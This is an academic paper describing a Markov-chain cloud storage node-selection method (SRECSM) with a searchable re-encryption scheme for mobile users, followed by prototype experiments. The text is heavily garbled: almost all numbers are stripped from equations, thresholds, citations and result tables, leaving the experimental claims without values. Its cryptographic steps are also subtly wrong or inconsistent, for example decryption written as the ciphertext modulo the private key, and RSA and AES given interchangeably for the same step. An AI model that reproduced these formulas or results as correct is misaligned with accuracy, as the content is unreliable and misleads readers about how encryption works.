efforts have been made by researchers, developers, practitioners, and educators to identify and discuss the technical challenges and recent advances related to cloud storage. han et al. [ ] proposed multi-path data prefetching in mobile cloud storage; multi-path prefetching tends to prefetch more successors to ensure a high prefetching hit rate and efficiency, and achieves a higher overall throughput when accessing cloud storage services via a mobile network. based on cloud storage, lee et al. [ ] designed an efficient delta synchronization (eds) algorithm for mobile cloud storage applications, which aggregates the updated data to reduce synchronization traffic and synchronizes the aggregate periodically to maintain consistency. wang et al. [ ] presented an optimized replica distribution method (ordm) for cloud storage systems. zhang et al. [ ] modeled a cloud storage system and proposed a markov decision process modeling framework to analyze the reliability of the storage system. chen et al. [ ] proposed a new metric called joint response time, which considers not only the waiting time when the requested data are unavailable but also the queuing delay and service time once the data become available. these methods achieve cloud storage, but cloud storage that accounts for data size based on a markov model is not considered. aiming at this problem, srecsm is proposed in this paper to satisfy cloud storage periodically.

most of the existing security schemes designed for the mobile cloud storage environment are based on traditional cryptographic methods or pairing-based cryptography. the further deployment of cloud storage is limited by its security risks. the schemes presented in [ - ] and [ , ] provide security features for mobile users in the cloud environment using traditional cryptographic methods, while the security schemes discussed in [ - ] and [ ] are based on pairing-based cryptography for securely offloading data access operations to the cloud in a trusted mode.
few of the schemes in this classification execute the entire set of security operations on the mobile device; the rest delegate the security management operations to the cloud, to a trusted entity under the control of the client organization, or to a trusted entity under the control of a third party. in the category of local execution, a small number of schemes focus on reducing the computational complexity of the cryptographic algorithms to lessen the processing burden on the mobile device. zhao et al. [ ] proposed a method for trusted data sharing on untrusted cloud servers using a progressive elliptic curve encryption (pece) scheme; pece allows a message to be encrypted multiple times with different keys and decrypted in a single run with a single key. ren et al. [ ] provide security features for mobile users in the cloud environment using traditional cryptographic methods; the focus of their schemes is to reduce the computational complexity of the cryptographic operations instead of offloading the computationally intensive operations to the cloud. in [ ], the size of the ciphertext grows linearly with the number of ciphertext attributes, and decrypting the ciphertext involves more pairing evaluations and exponential operations; moreover, the data owner has to transform the plaintext into ciphertext, and vice versa, which requires executing computationally intensive multiplications and exponentiations of large numbers on a resource-constrained mobile device. the works in [ - ] propose proxy re-encryption algorithms to ensure the security of the data in the cloud, which can alleviate the client's burden and enhance the confidentiality of cloud data. however, there are two major disadvantages with these techniques. first, for re-encryption, the data owner must obtain the user's public key before uploading. second, because the same plaintext is encrypted with different keys generated by the proxy, the storage overhead becomes excessive. a manager-based re-encryption scheme (mres) defined in [ ] achieves data confidentiality for mobile users by using a proxy re-encryption strategy; the proxy re-encryption helps the mobile user delegate the data access operation to a third party. another cryptographic scheme, defined by tysowski and hasan in [ ], is the cloud-based re-encryption scheme (cres), which covers the limitations of the existing manager-based re-encryption scheme and of its variations based on user-managed key ciphertext fetched by the user. however, these two schemes are more complex and need more time to re-encrypt. to optimize cloud storage and safe transmission and to minimize cost and computational complexity, we propose a new scheme with searchable re-encrypted data in srecsm. this technique is simpler and faster when sorting the arrays using most-significant-digit radix sort: it reduces the cost for the data owners up to o(nt* ) and the time complexity up to o(b), where b denotes the bucket size of the database.

iii. construction of srecsm model

the transfer probability of the markov chain is introduced into cloud storage. the stored procedure in the cloud system is similar to a markov process. therefore, a searchable re-encryption cloud storage method based on markov chain is proposed in this paper, which can realize reliable and safe storage on the mobile terminal.
from a probability point of view, the data are scheduled to be stored in the node with the lowest storage cost in real time. first, the storage state of srecsm is divided, and three state models are obtained. according to the storage cost of the nodes for storing files of different sizes, the state matrix at the current time is obtained by using the steady-state markov strategy, and the state transfer probability matrix is calculated with the support of a sufficient number of samples. the storage state probability of srecsm can then be predicted quickly for the future, and the optimal storage node is selected to implement cloud storage access on the mobile terminal. when a request is made by a mobile terminal, the storage node with the lowest cost is selected for storing. srecsm can save time and effectively improve storage efficiency, while the load balancing of the system is also guaranteed.

a. the finite state space and the state distribution

the markov chain is a discrete random process with the markov property: the next state of the process is related only to the current state, not to its historical states. therefore, the distribution of the future states of the process depends only on the present, not on the past. the srecsm based on markov chains consists of the following three parts, {s, r, p}, in which s is the finite state space, r stands for the state distribution, and p is the probability matrix of state transfer.

the servers in a cloud storage group are called storage nodes. each node can store large, medium, and small files: files larger than mb are called large files, files no larger than mb are defined as small files, and files between mb and mb are defined as secondary files. the storage nodes differ in hardware performance, load situation, network link state, and so on; therefore, each storage node has a different storage cost for storing large, secondary, and small data. that is, the storage cost for storing files of different sizes differs from node to node. in the cloud system, depending on the size of the data file to be stored, each node has different storage costs for large, secondary and small files, and the optimal storage node is selected accordingly.

based on the analysis above, the srecsm based on markov chain is proposed in this paper. the process of storing three different sizes of data in a storage cluster is treated as a discrete state space s. moreover, during data storage, the selection of the next storage node is related only to the storage cost of the current storage node; therefore, the data storage procedure of the cloud system conforms to the characteristics of a markov chain. in the srecsm proposed in this paper, the state space s comprises the following three types.

state (small file status): the optimal storage node for storing small files in a storage group cluster is selected to implement data storage.
state (secondary file status): the optimal storage node for storing secondary files, which are between small files and large files, is selected to implement data storage.
state (large file status): the optimal storage node for storing large files in a storage group cluster is selected to implement data storage.
the state space of the cloud storage based on markov chain is defined in formula ( ):

s = {s_1, s_2, s_3},  ( )

where s_1 denotes the storage cost for storing small files on each storage node in the cluster, s_2 denotes the storage cost for storing secondary files on each storage node in the cluster, and s_3 denotes the storage cost for storing large files on each storage node in the cluster.

moreover, according to the rules of probability, the more finely the storage state of the cloud storage system is partitioned, the more explicit the guidance provided by the storage solution prediction will be; however, the computing resources needed for partitioning the state of the cloud storage scheme also grow. as we can see, when choosing cloud storage solutions, the granularity of the storage state partition is a compromise decision: the more detailed the storage state is, the more simplification is needed to reduce the computational burden, and the more storage states there are, the greater the redundancy of the storage scheme. an over-fine partition of the storage state therefore not only complicates the analysis but also reduces the storage speed. in fact, the storage state cannot be enumerated exhaustively, and it is difficult for srecsm to handle a large number of storage states, so a coarse partition of the storage state is appropriate for the study of srecsm. the storage state defined in this paper is divided into three states: large file status, secondary file status and small file status. whether for actual project data or for simulation analysis, these three states are relatively simple and can better satisfy the requirements of data storage in the cloud system.

the storage group has an irregular connection to the network. the distribution matrix of the storage state in the cloud system is defined as r, and each entry in the matrix is the storage cost of storing data on a certain storage node. therefore, according to the storage cost of the nodes in the large, medium and small states, the distribution matrix r(i) of the storage status at time t_i can be obtained; r(i) is defined in formula ( ):

r(i) = [r_1(i), r_2(i), r_3(i)]^T = [p{x(t_i) = s_1}, p{x(t_i) = s_2}, p{x(t_i) = s_3}]^T.  ( )

b. the probability matrix of the state transfer

the number of states in the state space is denoted by n. the transfer probabilities can be represented in the form of a matrix, which is defined as the probability matrix of state transfer. the probability matrix p of the state transfer always stays the same, and p is a matrix of order n. if the intervals among t_1, t_2, ..., t_n are always the same, then, according to homogeneity, p is defined in ( ):

p = [ p_11  p_12  ...  p_1n
      p_21  p_22  ...  p_2n
      ...
      p_n1  p_n2  ...  p_nn ].  ( )

the transfer probability matrix has two properties, shown in formula ( ):

0 <= p_ij(t) <= 1,  i, j = 1, ..., n;    \sum_{j=1}^{n} p_ij(t) = 1,  i = 1, ..., n.  ( )

in equation ( ), p_ij refers to the probability of a transition from state s_i to state s_j. the sum of each row in the probability matrix is one.
in other words, the sum of the probabilities of transition from a storage state s_i to all storage states s_j is one. according to the previous analysis, each storage node in a storage group has different storage costs for storing files of the three different sizes. therefore, in the cloud system, if large, medium and small files need to be stored on a storage node, the higher the integrated storage cost, the less likely this node is to be used to store data; conversely, the smaller the storage cost of the node for storing large, medium and small files, the more likely the node is to be selected. the state space of srecsm is represented in ( ), and the storage status transfer is shown in figure (storage status transition diagram, with transitions among the small file, secondary file and large file statuses). according to the probability values of the transitions among the three states of a storage node, the probability matrix of the state transfer in srecsm is shown in formula ( ):

p = [ 1 - p_12 - p_13     p_12                p_13
      p_21                1 - p_21 - p_23     p_23
      p_31                p_32                1 - p_31 - p_32 ].  ( )

c. algorithm of srecsm

users access the network through a mobile terminal, and the mobile terminal chooses to communicate with the node that has the lowest cost in the storage group. moreover, the storage group uses an irregular connection. therefore, to improve the reliability of the cloud storage system, a multi-replica mechanism is introduced, by which the storage efficiency of the cloud system can be effectively improved: when a mobile terminal makes a request, the replica with the lowest cost can be chosen. in a traditional cloud storage system, however, the master copy is selected first, and only when the master copy fails is the request sent to a backup copy regardless of its region; this kind of storage affects the speed of the cloud system. based on this idea, the transfer probability of the markov chain is used in srecsm: the storage cost of each storage node is measured from the perspective of probability, the state matrix after a one-step transfer is obtained by means of the probability matrix of the state transfer, and finally the state matrix after a multi-step transfer is obtained to predict the probability of the storage cost at a certain future time. the optimal storage node is then chosen to realize the data storage.

the main idea of the srecsm algorithm in the cloud system is introduced below. the storage states of the strategy are proposed for the implementation of data storage. in the srecsm algorithm, the standard for dividing the storage status is proposed, which is convenient for engineering implementation; at the same time, the transfer expression corresponding to the storage state is obtained. then, based on the historical data stored in the cloud system, the probability matrix of state transfer is obtained, and the probability and reliability of the storage status of the cloud system at some future time are predicted using the probability matrix of the state transfer and the matrix of the storage state at the current moment. the steps of the algorithm of srecsm based on markov chain are as follows:

step 1: the distribution matrix r(0) of srecsm at the initial time t_0 is obtained.

step 2: according to the distribution matrix of the storage state and the probability matrix p of the state transition at time t_0, the state distribution matrix after a one-step transfer, i.e. after an interval Δt, is obtained as shown in formula ( ):

r(1) = r(0) p.  ( )

step 3: the storage distribution of the cloud storage system after 2Δt is shown in formula ( ):

r(2) = r(1) p = r(0) p^2.  ( )

after a period of about m intervals Δt, the storage status of the cloud system is shown in formula ( ):

r(m) = r(m-1) p = r(0) p^m.  ( )

through the procedure above, with r(0) and p known, the steady-state value of the cloud storage distribution in the system can be predicted quickly for any future time after every Δt interval.
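a minimal numpy sketch of the multi-step prediction r(m) = r(0) p^m; the transition matrix and initial distribution below are illustrative values, and the lowest predicted entry is read as the preferred storage state, following the cost interpretation used in the text.

```python
import numpy as np

P = np.array([[0.6, 0.3, 0.1],    # row-stochastic state-transfer matrix (illustrative)
              [0.2, 0.5, 0.3],
              [0.1, 0.4, 0.5]])
r0 = np.array([0.5, 0.3, 0.2])    # storage-state distribution at time t0 (illustrative)

def predict(r0, P, m):
    """state distribution after m intervals: r(m) = r(0) @ p^m."""
    return r0 @ np.linalg.matrix_power(P, m)

r_m = predict(r0, P, 5)
# the paper treats the normalized storage costs as the state distribution,
# so the smallest entry points at the preferred storage state/node
best_state = int(np.argmin(r_m))
print(r_m, best_state)
```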
according to the storage cost of data stored on the different nodes, the storage cost matrix of the system at the current time is obtained, which is the state distribution matrix of the system, shown in formula ( ):

r(i) = [r_1(i), r_2(i), r_3(i)]^T = [p{x(t_i) = s_1}, p{x(t_i) = s_2}, p{x(t_i) = s_3}]^T.  ( )

in formula ( ), s_i represents the storage cost needed to select a storage node at time t_i. from formula ( ) we know that s_i lies in the range [0, 1]. s_i is obtained by normalizing the correlated properties of the data stored on the node at time t_i. there are three such properties at time t, represented by the symbols q, d and l, which respectively denote the length, the latency and the packet loss of the stored data. the storage cost of the node is given by formula ( ):

s = \omega_q s_q + \omega_d s_d + \omega_l s_l,  ( )

where the three weights satisfy the relationship in formula ( ):

\sum_{k \in \{q, d, l\}} \omega_k = 1.  ( )

because the parameters q, d and l are all cost indicators, the smaller the value, the better the quality of the data stored on this node. each normalized term is obtained as in formula ( ):

s_k = (k_max - k) / (k_max - k_min),  k \in \{q, d, l\}.  ( )

in formula ( ), q is obtained from the length of the stored data block, while d and l are obtained by timing: a timer is started when each data block begins to be stored and stopped when the response is received, and the two parameters are then calculated from the measured time. the storage quality of each storage node is evaluated through the above method, and the distribution matrix of the storage status is updated in stages. the pseudo-code of the algorithm in srecsm is described in figure (pseudo-code in srecsm).

therefore, in the srecsm based on markov chains, the distribution of the state in the future is obtained by means of the probability matrix p of the state transfer and the distribution matrix r(0) of the state at the initial time: the distribution of the storage state at time nΔt is calculated, and the choice of srecsm is realized through matrix operations.
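the cost evaluation of formulas ( )–( ) can be sketched as follows; the equal weights are an illustrative choice, since the text only requires that the weights sum to one.

```python
def normalized_indicator(k, k_min, k_max):
    """min-max normalization of a cost indicator k (length q, latency d, or
    packet loss l), as in the reconstructed formula: s_k = (max - k) / (max - min)."""
    return (k_max - k) / (k_max - k_min) if k_max != k_min else 0.0

def storage_cost(q, d, l, bounds, weights=(1 / 3, 1 / 3, 1 / 3)):
    """weighted combination of the three normalized indicators; `bounds` maps
    each indicator name to its (min, max) pair observed in the cluster."""
    sq = normalized_indicator(q, *bounds["q"])
    sd = normalized_indicator(d, *bounds["d"])
    sl = normalized_indicator(l, *bounds["l"])
    wq, wd, wl = weights
    return wq * sq + wd * sd + wl * sl
```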
IV. Searchable Re-encryption Method

The central idea of searchable re-encryption is to generate a re-encryption key and to decrypt only when the keyword matches. Because all encrypted data has to be stored, searchable re-encryption by itself increases the storage demand of SRECSM; the objective of the proposed searchable re-encryption method is therefore to improve flexibility and data utilisation while reducing the storage requirement, the security issues, the overhead ratio, the cost and the searching time. The technique is simple and fast, sorting keyword arrays with a most-significant-digit radix sort; it reduces the cost borne by the data owners and lowers the time complexity, at the price of the extra storage space needed for the encrypted data.

A. Symbol Definitions

The symbols used in the searchable re-encryption method are defined in Table I.

Table I. Symbol definitions
  pr(k)     private key generated by the data owner
  pu(k)     public key generated by the data owner
  kw        keyword
  db        database (all data passed to the cloud servers is stored here)
  ek        edited keyword
  ed        encrypted data
  pr(k)re   re-encrypted private key
  pu(k)re   re-encrypted public key
  ed re     re-encrypted (encrypted) data
  dd        decrypted data
  kw(pu)    keyword bound to the public key
  kw(pr)    keyword bound to the private key
  do        data owner (sender)
  du        data user (receiver)
  cs        cloud server (third party)

B. Keyword Editing

By searching the keyword, the keyword can be edited with the help of three operations, applied at some position i of the edited keyword ek(n): insertion, deletion or substitution.

Case 1, insertion: for the old character string "bok", with i pointing at the third position, a new character is inserted there, giving the new string "book".

Case 2, deletion: for the old string "bok", with i pointing at the third position, the letter at that position is deleted, giving "bo".

Case 3, substitution: for the old string "bok", with i pointing at the third position, a new character is substituted at that position.

These three operations make it easy to edit a keyword: if a data user submits a keyword containing a mistake, the keyword can be edited through one of the three cases so that the respective data can still be recovered.

C. Searchable Re-encryption

The central idea of the searchable re-encryption is to generate a re-encryption key and to decrypt when the keyword matches. The re-encryption operates over two groups $G_1$ and $G_2$ of prime order $q$ with a bilinear map $e:G_1\times G_1\to G_2$; the system parameters are a random generator $g\in G_1$ and $Z=e(g,g)\in G_2$. The searchable re-encryption is defined by the algorithms that follow. Algorithm 1 searches for the re-encrypted keyword; if the keyword matches, the data can be decrypted, received and accessed by the users. A minimal sketch of the keyword-editing operations is given below.
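The following is a minimal sketch, reconstructed from the three editing cases above; the function name and the example strings are illustrative rather than taken from the paper. It shows how a mistyped keyword can be repaired by a single insertion, deletion or substitution.

```python
# Minimal sketch of keyword editing: one insertion, deletion or
# substitution at a 0-based position i, as in the three cases above.
def edit_keyword(kw: str, i: int, case: str, ch: str = "") -> str:
    """Apply one edit at position i: 'insert', 'delete' or 'substitute'."""
    if case == "insert":        # e.g. "bok", i=2, ch="o"  -> "book"
        return kw[:i] + ch + kw[i:]
    if case == "delete":        # e.g. "bok", i=2          -> "bo"
        return kw[:i] + kw[i + 1:]
    if case == "substitute":    # e.g. "bok", i=2, ch="x"  -> "box"
        return kw[:i] + ch + kw[i + 1:]
    raise ValueError("case must be insert, delete or substitute")

assert edit_keyword("bok", 2, "insert", "o") == "book"
assert edit_keyword("bok", 2, "delete") == "bo"
assert edit_keyword("bok", 2, "substitute", "x") == "box"
```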
Algorithm 1: Keyword searching
  Input: keyword bound to pr(k)
  Output: keyword matched
  if pr(k) matches kw then
      go to db(i)
  else if ek(n) can be edited at position i (cases 1-3) then
      edit the keyword and go to db(i)
  else
      return "not matching"
  end if
  return "keyword matched"

Initially the private key contains the keyword, and that keyword is searched in the database: the keyword bound to the private key is verified against the database of the cloud data storage. Data owners transmit the data to the cloud servers, and the cloud server stores the data in the database. The data users then retrieve the data from the database using the keyword. If the keyword does not match, the data user applies the editing scheme (insertion, deletion or substitution); if the keyword matches, the data users receive the data from the cloud servers, as described in Algorithm 2.

Algorithm 2: Data sharing
  generate pu(k), pr(k)
  pu(k) = (ed, kw(pu));  pr(k) = kw(pr)
  do shares pu(k) with cs
  do shares pr(k) with du
  do sends ed to cs
  du sends kw(pr) to cs
  cs verifies kw(pr)
  if kw(pu) = kw(pr) then cs sends (dd, kw(pr)) to du

Algorithm 2 describes the sharing of a data file between the data owner and the data users through the cloud server. The data owner first creates the public key and the private key; the public key is shared with the cloud servers and the private key is shared with the data users. Every private and public key carries its own keyword, and based on that keyword the data users retrieve the data: if the keyword of the public key and the keyword of the private key match, the cloud server transmits the data to the data users.

Algorithm 3: Data encryption
  consider two prime numbers x and y
  assign z = x*y, where z is used as the modulus of the private and public keys
  assign Euler's function e(z) = (x-1)(y-1)
  consider an integer i such that 1 < i < e(z), with i and e(z) co-prime
  assign d = {f1, f2, ..., fn}; f the files, d the data, n the number of files
  d(z) = {f1(z), f2(z), ..., fn(z)}
  encrypted data: ed = d^i mod z, bound to kw(pu(k))

Algorithm 3 gives the data encryption scheme, which follows the RSA algorithm: the modulus is the product of the two prime numbers, Euler's function of the modulus is computed, and the public exponent is chosen co-prime with it. Each data block is then encrypted by modular exponentiation, and the resulting ciphertext carries the public key and the keyword. A minimal sketch of this encryption, together with the matching decryption of Algorithm 5 below, is given after this page.

Algorithm 4: Data re-encryption
  generate pr(k)re, pu(k)re
  assign d = {f1, f2, ..., fn}, with generator g of G1; f the files, d the data, n the number of files
  d(z) = {f1(z), f2(z), ..., fn(z)}
  re-encrypted data: ed_re(c) = e(pu(k)re, ed(c)_a)

Algorithm 4 gives the data re-encryption scheme, for which the paper relies on the AES algorithm to encrypt the data. The mobile user A generates the re-encryption keys for its authorised users' list U from the users' public keys and its own private key,

$$pu(k)^{re}_{i}=g^{\,x_i/x_a},\qquad u_i\in U,$$

where $x_a$ is A's private exponent and $g^{x_i}$ is the public key of user $u_i$. The CSRESM then generates $r_i\in\mathbb{Z}_q^{*}$ at random and encrypts the message $m$ as

$$ed(c)=\big(Z^{r_i}m,\ ed(c)_a=g^{\,r_i x_a}\big),$$

and uploads the encrypted message $ed(c)$ and $ed(c)_a$ on behalf of the mobile user A.
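The following is a minimal, non-hardened sketch of the RSA-style flow outlined in Algorithm 3 and in the decryption of Algorithm 5 below: textbook RSA with tiny illustrative primes, no padding, and hypothetical helper names. It illustrates the technique only; it is not the paper's implementation and omits the keyword binding and the pairing-based re-encryption.

```python
# Minimal textbook-RSA sketch of Algorithms 3 and 5 (illustration only,
# insecure parameters, no padding).
from math import gcd

def keygen(x: int, y: int):
    z = x * y                       # modulus used by both keys
    e_z = (x - 1) * (y - 1)         # Euler's totient of z
    i = next(k for k in range(3, e_z) if gcd(k, e_z) == 1)  # public exponent
    d = pow(i, -1, e_z)             # private exponent (Python 3.8+)
    return (i, z), (d, z)

def encrypt(block: int, pub):       # ed = block^i mod z
    i, z = pub
    return pow(block, i, z)

def decrypt(ed: int, priv):         # dd = ed^d mod z
    d, z = priv
    return pow(ed, d, z)

pub, priv = keygen(61, 53)          # tiny primes, for illustration only
ct = encrypt(42, pub)
assert decrypt(ct, priv) == 42
```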
The CSRESM transforms $ed(c)_a$ into $ed_{re}(c)_a$ using the re-encryption key $pu(k)^{re}$ and $ed(c)_a$, as shown in the following equation:

$$ed_{re}(c)_a=e\big(pu(k)^{re},\,ed(c)_a\big)=e\big(g^{\,x_i/x_a},\,g^{\,r_i x_a}\big)=e(g,g)^{\,r_i x_i}.$$

Algorithm 5: Data decryption
  consider the decryption key d_key = (pr(k), kw)
  for f = 1 to n            // data files
      dd = ed mod pr(k)
  end for
  return dd

Algorithm 5 is the data decryption algorithm. The data user first uses the decryption key, which contains the private key together with the keyword, then selects the number of files and decrypts the data with the modular operation: every data block is decrypted using the decryption key.

D. Security Analysis

Assume that the reliability of the cloud storage system is denoted by $A$. The time taken by the different encryption algorithms is $t_a$; this encryption time is first inverted and then normalised, giving $a_j$. According to the Markov chain, the storage cost of each node is normalised to the value $a_k$, and the number of storage states of the cloud storage is $n$. The reliability model of the system is then

$$A=\big[1-(1-a_j)^{n}\big]\,\big[1-(1-a_k)^{n}\big].$$

The following can be concluded from this reliability model. When the value of $t$ tends to infinity, the storage cost of the nodes in the cloud system also tends to a stable value and the state of the storage strategy becomes stable; and the closer the values of $a_j$ and $a_k$ are to one, and the larger the value of $n$, the more reliable and the more secure the cloud storage system is. A minimal computational sketch of this model follows.
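The following is a minimal sketch of the reliability model as reconstructed above. The exact placement of the exponent n is an assumption made while repairing the garbled formula, and the numerical inputs are illustrative only.

```python
# Minimal sketch of the reliability model
# A = [1 - (1 - a_j)^n] * [1 - (1 - a_k)^n]:
# the closer a_j and a_k are to 1 and the larger n is, the closer A is to 1.
def reliability(a_j: float, a_k: float, n: int) -> float:
    return (1 - (1 - a_j) ** n) * (1 - (1 - a_k) ** n)

# Reliability grows with n and with a_j, a_k approaching 1 (illustrative values).
print(reliability(0.9, 0.8, 3))   # ~0.991
print(reliability(0.6, 0.5, 3))   # ~0.82
```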
V. Prototype System and Experiment

A. Prototype System

HDFS and Dynamo are reliable solutions commonly used in cloud storage systems. HDFS is a distributed file system suited to running on commodity hardware: it has good fault tolerance and can run on inexpensive machines, and programs on HDFS handle large data sets, with typical file sizes ranging from gigabytes to terabytes, so terabyte-scale files are supported through high aggregated data bandwidth and a cluster can contain hundreds of node devices. Dynamo uses a consistency hash algorithm: a node owns not a single hash value but a range of hash values, and when the hash of a key falls in this range the ring is searched clockwise, the first node encountered being the one required. Dynamo further improves the consistency hash by letting a set of devices, rather than a single device, act as a node on the ring, and a synchronisation mechanism is used to keep the data consistent. In HDFS the number of copies is set to three, and whether data is stored on a node depends on the node's capacity: the greater the capacity, the greater the probability that the data will be stored on it, so when node capacities differ widely the large-capacity nodes in the system become overloaded. According to the analysis above, the storage cost of each storage node in the cloud system is therefore measured from the perspective of probability.

Moreover, a dynamic copy mechanism is adopted to adjust, in real time, the number of copies used by the storage strategy and their placement according to the system performance requirements, the load, and so on. Combined with the transition probabilities of the Markov chain, the dynamic replica mechanism completes the data storage in time, and the reliability and availability of SRECSM are improved effectively. The storage group is used as the hardware architecture of the cloud storage system, and the storage group is connected as an irregular network; its architecture is shown in the corresponding figure (system architecture diagram of the storage group). PCs are used as the storage medium in the storage group; however, the reliability of a PC is not high, and it may even fail while data is being stored, so replicas are required to ensure that the data is reliable. According to the reliability criteria of the system, the storage state of the cloud system is divided into three types: the small-file status, the large-file status, and the secondary-file status in between.

In the storage group system, every PC stores all the information about its adjacent nodes, so the storage nodes that are needed can be found quickly by querying the information stored in the nodes. According to the transfer probability matrix and the state distribution matrix of SRECSM described previously, the storage strategy at a given time is predicted. The storage space of the storage group is structured as a ring and addressed uniformly, so that the differences in performance among the PCs are offset by the virtual contiguous storage space. First, the message-digest (MD5) hash algorithm is used to implement the address conversion of the system: the actual physical address is processed and converted into a fixed-length information string by the MD5 algorithm, and these strings are stored in the virtual contiguous address space, which offsets the performance differences between devices. The converted address is mapped onto the virtual storage ring of the storage group through the MD5 algorithm; the device is found in the clockwise direction, the data is stored on the first PC it maps to, and the data is then backed up to the adjacent PCs. The larger the amount of data in the system, the more uniform the spatial distribution becomes. When data is stored, the routing tables of the corresponding PC and of the adjacent PCs are updated; the routing information table is shown in Table II.

Table II. Routing table
  Field   Type      Note
  id      int       serial number
  fname   varchar   file name
  fsize   int       file size
  ip      varchar   IP address

The IP field of the routing information table stores the IP address of the PC device on which the file replica is located; it is the routing information for the adjacent PC. Once a node fails, all the information stored on that node has already been backed up, and the routing information of the adjacent nodes is modified in time. Following the principle of the consistency hash algorithm, when a new device is added to the storage group its storage space is mapped to a new virtual address space; the existing space on the ring is not changed, which is very effective in avoiding vibration of the address space, and the routing information on the adjacent PCs is updated. A minimal sketch of this placement scheme is given below.
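The following is a minimal sketch, not the paper's code, of the placement scheme just described, assuming MD5 digests and a simple sorted-list ring; node names and file keys are hypothetical, and a single adjacent replica is shown for brevity (the text backs up to the adjacent PCs).

```python
# Minimal consistent-hashing sketch: node addresses are hashed onto a
# ring, a file key is stored on the first node found clockwise, and a
# replica is kept on the next adjacent node.
import bisect
import hashlib

def h(key: str) -> int:
    return int(hashlib.md5(key.encode()).hexdigest(), 16)

class Ring:
    def __init__(self, nodes):
        self.points = sorted((h(n), n) for n in nodes)

    def place(self, file_key: str):
        keys = [p for p, _ in self.points]
        i = bisect.bisect_right(keys, h(file_key)) % len(self.points)
        primary = self.points[i][1]
        replica = self.points[(i + 1) % len(self.points)][1]  # adjacent PC
        return primary, replica

    def add_node(self, node: str):
        # Only the ring segment owned by the new node changes; other
        # placements (and hence most routing entries) stay untouched.
        bisect.insort(self.points, (h(node), node))

ring = Ring(["pc-01", "pc-02", "pc-03"])
print(ring.place("report.pdf"))
ring.add_node("pc-04")
print(ring.place("report.pdf"))
```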
The process of adding a PC is shown in the corresponding figure and consists of the following steps: the IP address of an adjacent PC is obtained by broadcast; the virtual address is obtained through the consistency hash algorithm; the routing table of the new PC is created; and the routing tables of the adjacent PCs are updated.

B. Experiments and Result Analysis

The proposed scheme, SRECSM (searchable re-encryption cloud storage method based on a Markov chain), was developed in Java on the Linux platform, and the overall performance of the proposed scheme was then evaluated on real-time data applications. The scheme involves data owners and data users: the data owners create the encrypted data, the re-encrypted data is forwarded to the cloud storage servers, and the data users decrypt the data using the keyword and the private key. In this section we analyse the prediction, the searching time, the searching efficiency and the storage space while performing moving, copying, encryption, decryption and re-encryption operations. The final results are compared with existing techniques, namely CRES (a cloud-based re-encryption scheme) and MRES (a searchable encrypted data file sharing scheme).

1) Prediction of SRECSM

The Markov-chain-based SRECSM prediction is processed with a Dynamo-like system model. On the basis of the ideas and the model described above, the prediction algorithm was implemented in Python and verified by example; the simulation experiment only verifies the Markov property of the distributed storage strategy. First, the Monte Carlo method is used to run the simulation repeatedly over a number of intervals, counting the distribution of the storage states in these intervals and the changes of the storage status between adjacent intervals; the state transfer probability matrix P of the storage strategy is then obtained from these counts (a minimal estimation sketch is given below).

The meaning of the state transfer probability matrix P is as follows. Suppose that at the last time instant the cloud system is in the small-file storage state; at the next moment, with probability p11 it remains in the small-file storage state, with probability p12 it is transferred to the secondary storage state, and with probability p13 it is transferred to the large-file storage state. The storage group in the figure contains several nodes; because the hardware performance, the load situation and the network link state of the storage nodes in the cloud system differ, the storage cost of each node is different. Assume that at the initial moment t0 the storage costs for the large, medium and small storage states are s1, s2 and s3 respectively. The storage status distribution matrix R(0) of the cloud storage system at time t0 is then obtained from the normalised per-node costs as described above. Substituting R(0) and P into the one-step formula gives the one-step storage state distribution matrix R(1), and after a multi-step transition the storage state distribution matrix R(i) at time t_i is predicted quickly as R(i) = R(0)P^i.
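The following is a minimal sketch of how the state-transfer probability matrix P can be estimated from a simulated sequence of storage states by Monte Carlo counting of transitions between adjacent intervals; the state labels and the simulated sequence are illustrative, not the paper's data.

```python
# Minimal sketch: estimate P by counting transitions between adjacent
# intervals of a simulated storage-state sequence, then row-normalise.
import random
import numpy as np

STATES = ["small", "secondary", "large"]

def estimate_P(sequence):
    idx = {s: k for k, s in enumerate(STATES)}
    counts = np.zeros((3, 3))
    for a, b in zip(sequence, sequence[1:]):
        counts[idx[a], idx[b]] += 1
    rows = counts.sum(axis=1, keepdims=True)
    return counts / np.where(rows == 0, 1, rows)   # each row sums to 1

# Illustrative simulated observation of the storage state per interval.
random.seed(0)
seq = [random.choice(STATES) for _ in range(10000)]
P_hat = estimate_P(seq)
print(P_hat)
```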
                                    . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ir  the node with the lowest storage cost can be quickly selected by using the storage status distribution matrix introduced in equation ( ), which can realize real-time data storage. ) uploading and downloading of srecsm the data response tests are performed on file upload, file copy and file movement, for large files and small files respectively. experimental results demonstrate that the page is properly displayed, and the response time of the login page is basically completed within two seconds. the percentage of the response time for the transaction is shown in figure . figure . the percentage of the response time for the transaction through the analysis of figure , it can be known that percent of transactions in a mobile cloud storage system can be implemented quickly within two seconds. the experimental results show that the system responds fast. the international journal of advanced network, monitoring and controls volume , no. , average response time of the transaction is obtained from the diagram. although one of the response timing of transaction is longer, however the response time for most other transactions is acceptable. when this happens, it is thought that the performance of the mobile cloud storage system is better. table iii and table iv are the test result. table iii. the performance of the mobile end upload the data type of test utilization rate of mobile cpu(%) transmissi on rate (mbps) utilization rate of mobile /transmission rate raw data . . . after the encryption . . . table iv. the performance of the mobile end download the data type of test utilization rate of mobile cpu (%) transmissio n rate (mbps) utilization rate of mobile /transmission rate raw data . . . after the encryption . . . the ratio of cpu occupancy to upload speed is shown in table iii, which the data on the mobile side are tested before the encryption and after the encryption respectively. the ratio of cpu occupancy to download speed is shown in table iv, which the data on the mobile side are tested before the decryption and after the decryption respectively. it can be known from the table iii and the table iv, if the encryption and decryption mechanism are used for hdfs transmission, then the cpu utilization will be increased by an average of % ~ % and the overall file transfer rate will be reduced by % ~ %. as we can see,when the encryption and the decryption mechanism are used, more than three times the performance loss can be caused on the mobile end side. ) encryption and re-encryption after applying the keywords, based on that proposed scheme it will search the keyword. if it matches, data users will receive their respective data. based on the searching time and the storage space comparison graph has discussed below. data users considered for the proposed scheme is users and the available search keyword vary from to . cloud servers storage space obtain more than bytes and it uses the database to store all the encrypted data and the keywords. there are two questions to be considered: one is the impact of encryption and decryption on file speed. the other is the impact of encryption and decryption on the performance of the client host. the experimental data are listed in table v, which includes the time spent on encrypting the different sizes or different type files by using srecsm and the time spent on transmitting the file in hdfs. 
Table V. Time comparison of encryption and decryption using SRECSM
  Columns: file size (MB); file type (pdf, mp, mkv, doc, rmvb); SRECSM encryption time (ms); HDFS upload time (ms); SRECSM decryption time (ms); HDFS download time (ms).

